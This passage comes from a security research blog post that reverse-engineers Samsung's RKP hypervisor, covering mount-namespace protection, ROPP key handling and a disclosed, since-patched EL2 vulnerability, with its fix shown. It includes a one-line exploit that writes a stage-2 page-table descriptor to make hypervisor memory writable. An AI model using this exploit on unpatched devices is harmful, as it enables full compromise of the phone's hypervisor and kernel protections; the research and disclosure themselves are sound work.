rkp_cmd_ns_set_data |
The mnt_root
field, a pointer to the root of the mounted tree, which is an instance of the dentry
structure, and the mnt_sb
field, a pointer to thesuper_block
structure, are changed using the rkp_set_mnt_root_sb
function, which invokes the RKP_KDP_X53
command.
void rkp_set_mnt_root_sb(struct vfsmount *mnt, struct dentry *mnt_root,struct super_block *mnt_sb)
{
uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}
This command is handled by the rkp_cmd_ns_set_root_sb
hypervisor function, which calls rkp_ns_set_root_sb
. This function calls chk_invalid_ns
to check the vfsmount
integrity and sets its mnt_root
and mnt_sb
fields to the values provided as arguments.
void rkp_ns_set_root_sb(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure PA into a VA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the mnt_root field of the vfsmount structure to the dentry instance.
*vfsmnt = regs->x3;
// Set the mnt_sb field of the vfsmount structure to the super_block instance.
*(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
}
}
The mnt_flags
field, which contains flags such as MNT_NOSUID
, MNT_NODEV
, MNT_NOEXEC
, etc. is changed using the rkp_assign_mnt_flags
function, which invokes the RKP_KDP_X54
command.
void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}
Two other functions call rkp_assign_mnt_flags
. The first one, rkp_set_mnt_flags
, is used to set one or more flags.
void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f |= flags;
rkp_assign_mnt_flags(mnt,f);
}
Unsurprisingly, the second one, rkp_reset_mnt_flags
, is used to unset one or more flags.
void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f &= ~flags;
rkp_assign_mnt_flags(mnt,f);
}
This command is handled by the rkp_cmd_ns_set_flags
hypervisor function, which calls rkp_ns_set_flags
. This function calls chk_invalid_ns
to check the vfsmount
integrity and sets its flags
field to the value provided as an argument.
void rkp_ns_set_flags(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure PA into a VA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the flags field of the vfsmount structure.
*(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
}
}
The data
field, which contains type-specific data, is changed using the rkp_set_data
function, which invokes the RKP_KDP_X55
command.
void rkp_set_data(struct vfsmount *mnt,void *data)
{
uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}
This command is handled by the rkp_cmd_ns_set_data
hypervisor function, which calls rkp_ns_set_data
. This function calls chk_invalid_ns
to check the vfsmount
integrity, and sets its data
field to the value provided as an argument.
void rkp_ns_set_data(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure PA into a VA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the data field of the vfsmount structure.
*(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
}
}
The last command that is called as part of the namespace protection feature is the command RKP_KDP_X56
. It is called when a new mount is being created, by the rkp_populate_sb
function. This function checks the path of the mount point against the list below, then calls the hypervisor if it is one of the specific paths.
/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1
int art_count = 0;
static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
if (!mount_point || !mnt)
return;
if (!odm_sb &&
!strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
} else if (!rootfs_sb &&
!strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!sys_sb &&
!strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!vendor_sb &&
!strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
} else if (!art_sb &&
!strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
} else if ((art_count < ART_ALLOW) &&
!strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
if (art_count)
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
art_count++;
}
}
rkp_populate_sb
is called from do_new_mount
, which itself is called from do_mount
.
static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
int mnt_flags, const char *name, void *data)
{
// ...
buf = kzalloc(PATH_MAX, GFP_KERNEL);
if (!buf){
kfree(buf);
return -ENOMEM;
}
dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);
if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
rkp_populate_sb(dir_name,mnt);
kfree(buf);
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_ns_set_sys_vfsmnt
, which calls rkp_ns_set_sys_vfsmnt
. It ensures the vfsmount
structure given as an argument is valid by calling chk_invalid_ns
. It then copies its mnt_sb
field, the pointer to the superblock of the source file system mount, into the destination superblock pointer before storing this value again in one of the fields of the rkp_cred
structure.
void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
// ...
// If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
if (!rkp_cred) {
uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
return;
}
// Convert the destination superblock VA to a PA.
dst_sb = rkp_get_pa(regs->x2);
// Convert the source file system mount VA to a PA.
vfsmnt = rkp_get_pa(regs->x3);
// Get the enum value indicating which mount point this is.
mount_point = regs->x4;
// Ensure the vfsmnt structure is valid and hypervisor-protected.
if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
uh_log('L', "rkp_kdp.c", 945, "Invalid source vfsmnt %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
return;
}
// Sanity-check: the destination superblock must not be NULL.
if (!dst_sb) {
uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
return;
}
// Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
// Set the pointer to the destination superblock to the mnt_sb field value.
*dst_sb = mnt_sb;
// Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
switch (mount_point) {
case KDP_SB_ROOTFS:
*rkp_cred->SB_ROOTFS = mnt_sb;
break;
case KDP_SB_ODM:
*rkp_cred->SB_ODM = mnt_sb;
break;
case KDP_SB_SYS:
*rkp_cred->SB_SYS = mnt_sb;
break;
case KDP_SB_VENDOR:
*rkp_cred->SB_VENDOR = mnt_sb;
break;
case KDP_SB_ART:
*rkp_cred->SB_ART = mnt_sb;
break;
}
}
The mount namespace protection feature enables additional checking when executable binaries are loaded by the kernel. The verifications happen in the flush_old_exec
function, which is called from the loaders of the supported binary formats (see this LWN.net article). This mechanism also prevents the abuse of the call_usermodehelper
command that has been used in a previous Samsung RKP bypass.
If the current task is privileged, determined by calling is_rkp_priv_task
, the flush_old_exec
function will call invalid_drive
to ensure the executable's mount point is valid. If it is not, it will make the kernel panic.
int flush_old_exec(struct linux_binprm * bprm)
{
// ...
if(rkp_cred_enable &&
is_rkp_priv_task() &&
invalid_drive(bprm)) {
panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
}
// ...
}
is_rkp_priv_task
simply checks if any of the UID, EUID, GID, or EGID of the current task is below or equal to 1000 (SYSTEM
).
#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
struct cred *cred = (struct cred *)current_cred();
if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
return 1;
}
return 0;
}
invalid_drive
first retrieves the vfsmount
structure from the file
structure of the binary being loaded. It ensures it is hypervisor-protected by calling rkp_ro_page
(though that doesn't mean it is necessarily of the expected type). If then passes its superblock to the kdp_check_sb_mismatch
function to determine whether or not the mount point is valid.
static int invalid_drive(struct linux_binprm * bprm)
{
struct super_block *sb = NULL;
struct vfsmount *vfsmnt = NULL;
vfsmnt = bprm->file->f_path.mnt;
if(!vfsmnt ||
!rkp_ro_page((unsigned long)vfsmnt)) {
printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
return 1;
}
sb = vfsmnt->mnt_sb;
if(kdp_check_sb_mismatch(sb)) {
printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
return 1;
}
return 0;
}
kdp_check_sb_mismatch
, if the device is not in recovery and not unlocked, compares the superblock to the allowed ones, i.e. /root
, /system
, /product
, /vendor
, and /apex/com.android.runtime
.
static int kdp_check_sb_mismatch(struct super_block *sb)
{
if(is_recovery || __check_verifiedboot) {
return 0;
}
if((sb != rootfs_sb) && (sb != sys_sb)
&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
return 1;
}
return 0;
}
We explained in the section about Kernel Exploitation that JOPP is only enabled on the high-end Samsung devices and ROPP on the high-end Snapdragon devices. For this subsection about the hypervisor commands related to these features, we will be looking at the kernel source code and RKP binary for a Snapdragon device (the US version of the S10).
We believe the initialization commands of JOPP and ROPP in the hypervisor, rkp_cmd_jopp_init
and rkp_cmd_ropp_init
, respectively, are called by the bootloader (S-Boot), though we couldn't confirm it.
The first command handler, rkp_cmd_jopp_init
, does nothing interesting.
int64_t rkp_cmd_jopp_init() {
uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
return 0;
}
The second command handler, rkp_cmd_ropp_init
, expects an argument structure that needs to start with a magic value (0x4A4C4955). This structure is copied to the fixed physical address (0xB0240020). If the memory at another physical address (0x80001000) matches another magic value (0xCDEFCDEF), the structure is copied again at a last physical address (0x80001020).
int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
// ...
// Convert the argument structure VA to a PA.
arg_struct = virt_to_phys_el1(regs->x2);
// Check if it begins with the expected magic value.
if (*arg_struct == 0x4a4c4955) {
// Copy the structure to a fixed physical address.
memcpy(0xb0240020, arg_struct, 80);
// If the memory at another PA contains another magic value.
if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
// Copy the structure to another fixed PA.
memcpy(0x80001020, arg_struct, 80);
}
uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
} else {
uh_log('W', "rkp.c", 515, "RKP_e08bc280");
}
return 0;
}
In addition, ROPP uses two more commands, rkp_cmd_ropp_save
and rkp_cmd_ropp_reload
, that deal with the "master key".
rkp_cmd_ropp_save
does nothing and is probably called by the bootloader, but we again couldn't confirm it.
int64_t rkp_cmd_ropp_save() {
return 0;
}
rkp_cmd_ropp_reload
is called by the kernel in the ropp_secondary_init
assembly macro.
/*
* secondary core will start a forked thread, so rrk is already enc'ed
* so only need to reload the master key and thread key
*/
.macro ropp_secondary_init ti
reset_sysreg
//load master key from rkp
ropp_load_mk
//load thread key
ropp_load_key \ti
.endm
.macro ropp_load_mk
#ifdef CONFIG_UH
push x0, x1
push x2, x3
push x4, x5
mov x1, #0x10 //RKP_ROPP_RELOAD
mov x0, #0xc002 //UH_APP_RKP
movk x0, #0xc300, lsl #16
smc #0x0
pop x4, x5
pop x2, x3
pop x0, x1
#else
push x0, x1
ldr x0, = ropp_master_key
ldr x0, [x0]
msr RRMK, x0
pop x0, x1
#endif
.endm
This macro is called from the __secondary_switched
assembly function, which is executed when a secondary core is being booted.
__secondary_switched:
// ...
ropp_secondary_init x2
// ...
ENDPROC(__secondary_switched)
The command handler itself, rkp_cmd_ropp_reload
, sets the system register DBGBVR5_EL1
(that holds the RRMK, or "master key" used by the ROPP feature), to a value read from a fixed physical address (0xB0240028).
int64_t rkp_cmd_ropp_reload() {
set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
return 0;
}
This completes our explanations about Samsung RKP's inner workings. We have detailed how the hypervisor is initialized, how it handles exceptions coming from lower ELs, and how it processes the kernel page tables — all of that to protect critical kernel data structures that might be targeted in an exploit.
We will now a reveal a vulnerability that we have found, and that is now fixed, that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices with some minor changes.
Here is some information about the binaries that we are looking at:
A515FXXU3BTF4
Feb 27 2020
G973USQU4ETH7
Feb 25 2020
If you have been paying close attention while reading this blog post, you might have noticed two important functions that we haven't detailed yet: uh_log
and rkp_get_pa
. Let's go over them now, starting with uh_log
.
uh_log
does some fairly standard string formatting and printing, that we have omitted from the snippet below, but it also does other things. If the log level that was given as the first argument is 'D'
(debug), then it also calls uh_panic
. This will become important in a moment...
int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
// ...
// ...
if (level == 'D') {
uh_panic();
}
return res;
}
Now we turn our attention to rkp_get_pa
which is called by a lot of command handlers to convert kernel input. If the virtual address is in the fixmap, it calculates the physical address from the PHYS_OFFSET
(start of the kernel physical memory). If it is not in the fixmap, it calls virt_to_phys_el1
to perform a hardware translation. If that hardware translation doesn't succeed, it calculates the physical address from the KIMAGE_VOFFSET
(offset between kernel VAs and PAs). Finally, it calls check_kernel_input
to check if that address can be used or not.
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr) {
return 0;
}
if (vaddr < 0xffffffc000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0) {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
} else {
paddr = vaddr - KIMAGE_VOFFSET;
}
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
}
check_kernel_input(paddr);
return paddr;
}
virt_to_phys_el1
uses the AT S12E1R
(stage 1 & 2 at EL1 read access) instruction to translate the virtual address. If that translation, simulating a kernel read access, fails, it uses the AT S12E1W
(stage 1 & 2 at EL1 write access) instruction. If that translation, simulating a kernel write access, fails and the MMU is enabled, it will print the stack contents.
int64_t virt_to_phys_el1(int64_t vaddr) {
// ...
if (vaddr) {
at_s12e1r(vaddr);
par_el1 = get_par_el1();
if ((par_el1 & 1) != 0) {
at_s12e1w(vaddr);
par_el1 = get_par_el1();
}
if ((par_el1 & 1) != 0) {
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
if (!has_printed_stack_contents) {
has_printed_stack_contents = 1;
print_stack_contents();
}
has_printed_stack_contents = 0;
}
vaddr = 0;
} else {
vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
}
}
return vaddr;
}
The check_kernel_input
function returns if the kernel-provided VA, that has been converted into a PA, can be used safely. It only checks if the physical address is contained in the protected_ranges
memlist. As stated in the Overall State After Startup section, this memlist contains after startup:
pa_restrict_init
physmap
added in init_cmd_initialize_dynamic_heap
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = protected_ranges_contains(paddr);
if (res) {
res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
This should effectively prevent the kernel from giving an address that, once translated, falls into hypervisor memory. However, if the check fails, the uh_log
function is called with an 'L'
level and not a 'D'
one, meaning that the hypervisor will not panic and execution will continue as if nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.
Exploiting this vulnerability is trivial. It suffices to call one of the command handlers with the right arguments to immediately obtain an arbitrary write. For example, we can use the RKP_CMD_WRITE_PGT3
command, which is handled by the rkp_l3pgt_write
function that we have seen earlier. It is only a matter of finding what to write and where to write it to compromise the hypervisor.
Below is our one-liner exploit that targets the stage 2 page tables of our device by adding a level 2 block descriptor that spans over the whole hypervisor memory. By setting the S2AP
bit of the descriptor to 0b11, the memory mapping is writable, and because the WXN
bit set in s1_enable
only applies to the address translation at EL2 and not at EL1, we can now freely modify the hypervisor code from the kernel.
uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);
We noticed that binaries built after May 27 2020
include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It should have affected all devices with Exynos and Snapdragon chipsets.
Let's take a look at the latest firmware update available for our research device to see what the changes are. First, the check_kernel_input
function. Interestingly, instead of simply changing the log level, they duplicated the call to uh_log
. It's weird but at least it does the job.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = protected_ranges_contains(paddr);
if (res) {
uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
We also noticed while binary diffing that they added some extra checks in rkp_get_pa
. They are now enforcing that the physical address be contained in the dynamic_regions
memlist. Better be safe than sorry!
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr) {
return 0;
}
if (vaddr < 0xffffffc000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0) {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
} else {
paddr = vaddr - KIMAGE_VOFFSET;
}
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
}
check_kernel_input(paddr);
if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
}
return paddr;
}
Let's recap the various protections offered by Samsung RKP:
.rodata
region (read-only);cred
, task_security_struct
, vfsmount
) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;cred
field of a task_struct
In this deep dive into Samsung RKP's internals, we have seen how a security hypervisor can help against kernel exploitation. Like other defense-in-depth measures, it makes it harder for an attacker who has gained read-write access to fully compromise the kernel. But this great engineering work doesn't prevent making (sometimes simple) mistakes in the implementation.
There are a lot more things about the hypervisor that we did not mention here but that deserve a follow-up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining the differences between Exynos and Snapdragon implementations, digging into the new framework of the S20, etc.
Copyright © Impalabs 2021-2023